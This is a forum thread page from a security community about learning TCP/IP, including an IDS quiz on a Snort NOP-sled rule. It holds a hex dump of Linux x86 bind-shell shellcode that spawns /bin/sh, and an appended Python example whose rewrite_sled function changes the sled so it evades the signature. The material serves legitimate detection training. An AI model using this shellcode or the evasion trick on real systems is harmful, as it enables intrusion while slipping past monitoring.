Author Topic: Noob!!!  (Read 31754 times)
Pages: 1 2 [3] 4
Kev (Sr. Member, Posts: 428)
« Reply #30 on: November 24, 2007, 07:49:34 PM »

I think the problem with internet forums is semantics. Sometimes people read things differently than what a poster might mean. I know I am guilty of doing that. I agree with your comment, pseud0, that both are valid as long as at some point TCP/IP is fully understood. I made a post a year ago recommending someone learn TCP/IP as a foundation. But not just memorize it; actually try to visualize it in their head. In fact, why not learn both the tools and TCP/IP at the same time if you are lacking in that understanding? Even Emanon seemed to state that if you want to get good you need it. To be honest, I didn't understand what you meant by "taste great, less filling", but I am sure that is due to my dense head. One thing I have learned is that saying things like that can be open to all kinds of interpretations in a "heated" thread.
Kev (Sr. Member, Posts: 428)
« Reply #31 on: November 24, 2007, 07:52:45 PM »

Hey we are on page 3 now, lol!  Not to change the subject, but has any topic here made it to 4 pages? Just curious.
sedated (Newbie, Posts: 37)
« Reply #32 on: November 24, 2007, 07:58:57 PM »

So the moral of the thread was: learning everything is important, it's all needed, but reading books on TCP/IP is so boring. Cool
nebu10uz (Sr. Member, Posts: 368)
« Reply #33 on: November 24, 2007, 08:06:13 PM »


Hey Kev, to answer your question, my review on OSCP made it to 4 pages:

http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,1152.0/

Security+, OSCP, CEH
pseud0 (Recruiters, Full Member, Posts: 208)
« Reply #34 on: November 24, 2007, 08:08:35 PM »

The "tastes great, less filling" was the old Miller Lite advertisement...
http://video.google.com/videoplay?docid=-6857860323414691675&q=tastes+great+less+filling&total=21&start=0&num=10&so=0&type=search&plindex=3

CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
nebu10uz (Sr. Member, Posts: 368)
« Reply #35 on: November 24, 2007, 08:15:44 PM »


There's something I still want to add to this thread. The book "Programming Linux Hacker Tools Uncovered" by Ivan Sklyarov is a good example of why you need to know TCP/IP. With a strong foundation in TCP/IP you can write code to exploit or backdoor a system, scan your brains out, etc.

With a little knowledge of TCP/IP, I fully enjoyed this book. It was the first time that I saw TCP/IP in a programmatic way. All code is written in C, and all the source code comes on a CD. I highly recommend it.

Security+, OSCP, CEH
Kev (Sr. Member, Posts: 428)
« Reply #36 on: November 24, 2007, 08:32:46 PM »


Actually I found the commercial a little more intriguing than this thread, LOL. Hey, I am a guy, give me a break! I am not familiar with that book, Blackazarro; sounds good and I will check it out. Maybe we should stop this thread so it doesn't take away from Blackazarro's 4 page record, lol! 4 pages is a record, right?
sedated (Newbie, Posts: 37)
« Reply #37 on: November 24, 2007, 08:34:35 PM »

You know, it might be a good idea to have a sticky post for newcomers interested in the field of information security on what they should probably learn, with links to some books for them, and maybe a short tutorial on what the jobs entail and the certs to get there. I would write one out, but as I am currently in the learning process myself it might not be best. If there is already a thread like this I apologize; I didn't see one.
dean (Guest)
« Reply #38 on: November 24, 2007, 08:58:36 PM »

Heh, seems the thread is not dead, but perhaps it should be. Good point on knowing TCP/IP for socket programming, etc., blackazarro.

Anyway, glad to see the thread sparked some interest. But the thread did also start to get into the differences between hacking and pentesting. I don't see the point in posting about that now, but seeing as how the importance of TCP/IP and knowing how to read packets, etc. came up again, here is a little quiz. It's pretty simple if you can read hex. Smiley

From a pentester's perspective, knowing what the payload of an exploit looks like and why the IDS alerts on it is important, as this can help when trying to bypass IDSes, etc.

I just pulled this out of my IDS logs. The destination IP is my Windows 2003 IIS server.

alert ip $EXTERNAL_NET any -> $HOME_NET $SHELLCODE_PORTS
  (msg:"SHELLCODE x86 NOOP"; content: "|90 90 90 90 90 90
  90 90 90 90 90 90 90 90|"; depth: 128;
  reference:arachnids,181; classtype:shellcode-detect;
  sid:648; rev:5;)

it contained the following payload:

--snip--
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
--snip--

What does the hex 0x90 represent?

What is the purpose of the 0x90 in the content?

Based on the information available would you classify this alert as an event to log and ignore or something to be concerned about and to dig into further?

dean
don (Editor-In-Chief, Administrator, Hero Member, Posts: 4165)
« Reply #39 on: November 24, 2007, 09:36:35 PM »

Not only does that sound like a great new thread (hint hint), but how about a new board for security quizzes? Or maybe just post quizzes of the topic you like in a board that already exists? They can be anything you want... associated with a job desc or a specific cert.

So should I lock this topic?

Don

CISSP, MCSE, CSTA, Security+ SME
pseud0 (Recruiters, Full Member, Posts: 208)
« Reply #40 on: November 24, 2007, 09:41:22 PM »

0x90s are NOOPs on x86 systems.  Basically you use them to move your point of reference in a selected area of memory to a place of your choosing, then you dump in the selected payload (the rest of the code that isn't 0x90).  This is a normal approach for buffer overflows.

CISSP, CISM, CISA, GCIH, GREM, CEH, HMFIC, KTHXBIROFLCOPTER
Kev (Sr. Member, Posts: 428)
« Reply #41 on: November 24, 2007, 10:48:38 PM »

Hmm, good post, Dean. I like the idea of a challenge or testing part of the forum. It would be good for those new to this. Just simple things like what you posted, simple Snort logs, etc. Not full-out challenges.
nicky.coder (Newbie, Posts: 14)
« Reply #42 on: November 24, 2007, 11:15:04 PM »


Quote
[dean's IDS quiz from Reply #38 above, quoted in full: the Snort rule, the hex payload, and the three questions]

The above hex-encoded string is the normal "shellcode" to get a shell. The initial part is filled with "nops", so even if the EIP falls anywhere near, it should reach the shellcode.
The behaviour of this "sc" is to first set a group id ("setgid"), then to set the session id ("setsid"). Towards the end it tries to call "execve" to execute /bin/sh.

Anyway, this was the postmortem report of the small snippet you posted. The last hex byte was missing, which should be "68".

This is not a good shellcode. It needs some minor tweaking for successful exploitation, and it does not affect a Windows machine [because it is a Linux shellcode].

Had some fun reverse engineering that stuff!!!

Sec+, OSCP
Kev (Sr. Member, Posts: 428)
« Reply #43 on: November 24, 2007, 11:25:17 PM »

I guess the responses are proving my point as far as interest. But how can we keep it for newbs for a little while before others more experienced respond? I mean, this would work well if we gave people new to this a little time to respond before the more advanced jumped all over it. I mean, if we had an area for this dedicated to those trying to learn the basics. Or maybe everyone jumping on it is good exposure even for those just beginning? Hey, I might be way off target, but this thread did start off as how a newbie can get started, right?
dean (Guest)
« Reply #44 on: November 25, 2007, 08:37:36 AM »

Nice, nicky.coder. That is pretty much it.

The exploit would actually work, though. It was an old OpenSSH exploit. I only copied the part that was relevant to the questions. Nice catch on the /bin/sh as well. That is the telling part as to whether to treat this as an event or an incident.

Just to add a few definitions to nicky.coder's response.

1. EIP – instruction pointer register – controls program execution by pointing to the address of the next instruction to be executed. The instruction is executed and the instruction pointer is incremented. When a jump is encountered, the instruction pointer's value is altered to point to a new location in memory.

2. NOOP. A "NOP" or "NOOP" sled is, as the name implies, a lot of No Operations. The reason for the sled is that an attacker does not know the memory location where the executable code is; it is difficult to guess the location of the shellcode (your exploit payload) in memory, and so it is difficult to set the return pointer. An easier and more reliable method is to create a NOOP sled: include NOOPs in advance of the executable code, and if the pointer lands in the NOOP sled nothing will happen and execution will continue down the stack until executable instructions are reached.

dean

Quote
But how can we keep it for newbs for a little while before others more experienced respond? I mean, this would work well if we gave people new to this a little time to respond before the more advanced jumped all over it.

Kev, as for keeping it for people learning or starting out, don't you think they'll learn just as much from seeing other people posting? Honestly, I expected more than one person to answer it too.
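The rule and payload from dean's quiz, and the NOP-sled explanation in his last reply, as an added worked example. This is editor-added code, not from the original thread and not Snort's own matcher: it replays the SID 648 content/depth check over the bytes dean posted, pulls out the ASCII tail nicky.coder spotted, and then shows two cases the rule as written does not catch. The payload constant is the dump from the thread (220 bytes as posted, the trailing 0x68 missing). The list of alternative sled bytes is an assumption specific to this payload, chosen because the code that follows the sled zeroes ebx, ecx and edx before using them.

```python
"""Replay Snort SID 648 ("SHELLCODE x86 NOOP") against the quiz payload.

Added example for the EH-Net thread; not code from the original posts.
"""
import random
import re
from typing import List, Optional

# The rule's content match: 14 consecutive 0x90 bytes, with depth:128,
# i.e. Snort only looks inside the first 128 bytes of the packet payload.
SNORT_CONTENT = bytes.fromhex("90" * 14)
SNORT_DEPTH = 128

# Hex dump from dean's post (constructed constant: copied from the thread,
# final 0x68 of "/bin/sh" was cut off in the original dump).
PAYLOAD = bytes.fromhex("""
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90
90 90 31 db 31 c9 31 c0 b0 46 cd 80 89 e5 31 d2 b2 66 89 d0
31 c9 89 cb 43 89 5d f8 43 89 5d f4 4b 89 4d fc 8d 4d f4 cd
80 31 c9 89 45 f4 43 66 89 5d ec 66 c7 45 ee 0f 27 89 4d f0
8d 45 ec 89 45 f8 c6 45 fc 10 89 d0 8d 4d f4 cd 80 89 d0 43
43 cd 80 89 d0 43 cd 80 89 c3 31 c9 b2 3f 89 d0 cd 80 89 d0
41 cd 80 eb 18 5e 89 75 08 31 c0 88 46 07 89 45 0c b0 0b 89
f3 8d 4d 08 8d 55 0c cd 80 e8 e3 ff ff ff 2f 62 69 6e 2f 73
""")


def content_match(payload: bytes, content: bytes = SNORT_CONTENT,
                  depth: Optional[int] = SNORT_DEPTH) -> bool:
    """Emulate Snort's content + depth check. depth=None searches the whole payload."""
    window = payload if depth is None else payload[:depth]
    return window.find(content) != -1


def nop_sled_length(payload: bytes) -> int:
    """Count the leading run of 0x90 (x86 NOP) bytes."""
    n = 0
    while n < len(payload) and payload[n] == 0x90:
        n += 1
    return n


def printable_strings(payload: bytes, min_len: int = 4) -> List[bytes]:
    """ASCII runs in the payload: the quickest way to spot the /bin/sh tail."""
    return re.findall(rb"[\x20-\x7e]{%d,}" % min_len, payload)


# Single-byte instructions that can replace 0x90 for THIS payload:
# inc/dec ecx, edx, ebx (0x41 0x42 0x43 0x49 0x4a 0x4b). The code right after
# the sled does xor ebx,ebx / xor ecx,ecx / xor eax,eax / ... / xor edx,edx, so
# whatever these leave behind is discarded. Assumption: only valid for
# payloads that reset those registers before use.
ALT_SLED_BYTES = bytes([0x41, 0x42, 0x43, 0x49, 0x4A, 0x4B])


def rewrite_sled(payload: bytes, seed: int = 0) -> bytes:
    """Attacker view: swap the 0x90 sled for a mix of equivalent one-byte ops."""
    n = nop_sled_length(payload)
    rng = random.Random(seed)
    sled = bytes(rng.choice(ALT_SLED_BYTES) for _ in range(n))
    return sled + payload[n:]


def triage(payload: bytes) -> dict:
    """What an analyst wants from this alert at a glance."""
    return {
        "bytes": len(payload),
        "sled": nop_sled_length(payload),
        "sid648_fires": content_match(payload),
        "strings": printable_strings(payload),
    }


if __name__ == "__main__":
    print(triage(PAYLOAD))
    evasive = rewrite_sled(PAYLOAD, seed=1)
    print("rewritten sled fires SID 648:", content_match(evasive))
    shifted = b"A" * 120 + PAYLOAD
    print("120 filler bytes before the sled, depth 128:", content_match(shifted),
          "| same packet without depth:", content_match(shifted, depth=None))
```

Two things worth noticing when you run it. The rewritten sled no longer trips the 14-byte 0x90 match, but it shows up instead as an 83-character printable run in `printable_strings`, so a detection built only on the NOP byte moves the problem rather than solving it. And the `depth:128` in the rule means a sled that begins past the first 128 payload bytes is never examined; that is a rule-tuning caveat, not a reason to log and ignore the alert, since the `/bin/s` tail is still sitting in the packet either way.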
© 2013 The Ethical Hacker Network